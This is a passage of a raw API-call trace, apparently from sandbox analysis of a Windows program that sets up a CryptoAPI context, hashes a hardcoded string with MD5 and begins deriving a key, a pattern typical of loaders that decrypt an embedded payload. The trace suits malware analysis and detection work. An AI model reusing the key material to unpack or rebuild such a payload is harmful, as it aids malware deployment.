0x43e2700 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0e8 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0097.009] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.009] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0097.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0097.010] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0097.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0097.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.010] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0097.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0097.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0097.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0097.011] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0097.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0097.013] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0097.013] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0097.014] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0097.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.016] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0097.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.016] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0097.016] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.016] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.016] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.016] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca568, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0097.016] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0097.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0097.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0097.016] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0097.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0097.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0097.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca610, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0097.017] CryptHashData (hHash=0x41ac040, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0097.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.017] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, 